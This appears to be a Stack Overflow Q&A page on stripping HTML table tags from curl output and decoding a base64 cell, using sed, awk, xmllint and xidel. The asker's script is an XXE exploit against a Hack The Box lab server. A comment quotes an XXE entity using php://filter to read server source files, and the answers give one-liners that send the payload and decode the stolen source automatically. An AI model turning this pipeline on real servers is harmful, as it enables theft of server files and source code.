I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

  • Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include xmllint and similar tools that can be run from the command line. See, for example, "xmllint to parse a html file". Commented Aug 12, 2021 at 17:21
  • xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file) isn't working @CharlesDuffy Commented Aug 12, 2021 at 17:30
  • $(cat file)? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken. Commented Aug 12, 2021 at 17:31
  • Don't Parse XML/HTML With Regex. I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...). Commented Aug 12, 2021 at 17:33
  • while we've got some sample input: If DB were ready ... </table>, we don't have the matching expected output; please update the question with the expected output Commented Aug 12, 2021 at 17:33

3 Answers


Addressing the (original) issue of the sed error:

  • sed 's/</td>//g' uses / as the delimiter, but / is also part of the string to be replaced
  • net result: sed reads < as the pattern, td> as the replacement, and the leftover /g as flags; / is not a valid flag, hence "unknown option to `s'" at char 9
  • either switch to another delimiter that doesn't show up in the data (eg, |) or escape the / in the data (eg, <\/td>)
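
Both fixes can be sketched as follows. This is only an illustration on a single sample line shaped like the question's output; the variable names are made up for the example, and it does not endorse sed as an HTML parser.

```shell
#!/bin/bash
# Sample line in the same shape as the curl output in the question.
line='    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>'

# Option 1: use | as the delimiter so the / in </td> needs no escaping.
with_pipe=$(printf '%s\n' "$line" | sed 's|<td>||g; s|</td>||g' | tr -d ' ')

# Option 2: keep / as the delimiter and escape the / inside the pattern.
with_escape=$(printf '%s\n' "$line" | sed 's/<td>//g; s/<\/td>//g' | tr -d ' ')

printf '%s\n' "$with_pipe"
printf '%s\n' "$with_escape"
```

Both commands print the bare cell content; which form to use is mostly a readability choice.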

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=
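
To go one step further and decode the value, the awk output can be piped into base64. The sketch below assumes GNU coreutils base64 (where -d decodes) and recreates a shortened copy of the sample response in a temporary file, so the file and variable names are illustrative only.

```shell
#!/bin/bash
# Recreate a shortened copy of the sample response from the question.
sample=$(mktemp)
cat > "$sample" <<'EOF'
If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>
EOF

# Find the CWE: label cell, then print the cell content on the following line.
encoded=$(awk -F'[<>]' '$3 ~ "CWE:" {printme=1; next} printme {print $3; exit}' "$sample")

# Decode; command substitution drops the trailing newline inside the payload.
decoded=$(printf '%s' "$encoded" | base64 -d)
printf '%s\n' "$decoded"

rm -f "$sample"
```

Like the awk command itself, this relies on the label and the value sitting on consecutive lines.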

8 Comments

Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich.
Thank you!! My XXE uses php:// filter to generate base64 encoded source files from the server: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]> so I can now automatically just scrape the source code! I appreciate it!
@CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-)
It's a Hack The Box lab, not real world. I just like to automate my tools for the writeups @markp-fuso
@Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though.

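For extracting data from HTML, you are better off with this one-liner. The --html option lets xmllint accept input that is not well-formed XML (such as the stray text line before the table), and the trailing - makes it read from stdin:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --html --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' - | base64 -d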
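
A likely reason the question's /table/tbody/tr[2]/td[2] attempt reported an empty set is that, with --html, libxml2 wraps the fragment in html and body elements and, as far as I know, does not insert a tbody, so an absolute path starting at /table matches nothing. A relative // expression avoids depending on that wrapping. The sketch below tries this offline against a shortened sample string instead of the live server; it assumes xmllint (libxml2) and GNU base64 are installed, and the variable names are illustrative.

```shell
#!/bin/bash
# Shortened sample response in the same shape as the question's output.
response='If DB were ready, would have added:
<table>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
</table>'

# --html tolerates the stray first line; the trailing - reads stdin.
# Any parser diagnostics go to stderr and are discarded here.
encoded=$(printf '%s\n' "$response" |
  xmllint --html --xpath '//td[text()="CWE:"]/following-sibling::td/text()' - 2>/dev/null)

# Decode the extracted cell content.
printf '%s' "$encoded" | base64 -d
```

Feeding the document through a pipe also sidesteps the $(cat file) problem from the comments, where the file content is split into separate command-line arguments.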


Please don't use regex to parse HTML; use an HTML parser like xidel instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
